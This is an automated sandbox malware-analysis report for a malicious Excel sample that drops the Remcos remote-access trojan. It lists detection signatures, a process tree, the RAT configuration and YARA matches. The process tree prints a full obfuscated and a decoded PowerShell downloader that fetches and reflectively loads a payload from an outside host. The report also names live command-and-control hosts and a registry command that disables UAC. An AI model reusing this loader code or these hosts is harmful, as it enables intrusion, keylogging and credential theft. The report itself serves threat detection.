Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref19920830281982938RT.xls

Overview

General Information

Sample name:Ref19920830281982938RT.xls
Analysis ID:1447833
MD5:f5051793b6c98a29efba84f3821d1e30
SHA1:b6b446e72525796444ae132fbb6af6788f08c5de
SHA256:191a46b3849f0cc60ac2e0a3387585dd9c34e2b28cb66bffdbda08238ee53710
Tags:xls
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Remcos
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Microsoft Office drops suspicious files
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 1668 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3400 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRQBXDgTreEgDgTreLwDgTrewDgTreDDgTreDgTreNQDgTrewDgTreDDgTreDgTreMQDgTrevDgTreDQDgTreNQDgTrexDgTreC4DgTreODgTreDgTre3DgTreDEDgTreLgDgTre2DgTreDQDgTreLgDgTre4DgTreDkDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreaQBuDgTreGMDgTrebwBuDgTreHQDgTrecgBvDgTreHYDgTreZQByDgTreHQDgTreaQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3956 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 3964 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 3972 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • wscript.exe (PID: 3204 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • wscript.exe (PID: 2420 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1b17:$obj2: \objdata
  • 0x1aff:$obj3: \objupdate
  • 0x1adb:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1b17:$obj2: \objdata
  • 0x1aff:$obj3: \objupdate
  • 0x1adb:$obj4: \objemb
C:\Users\user\AppData\Local\Temp\note\nots.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        17.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          17.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            17.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            17.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
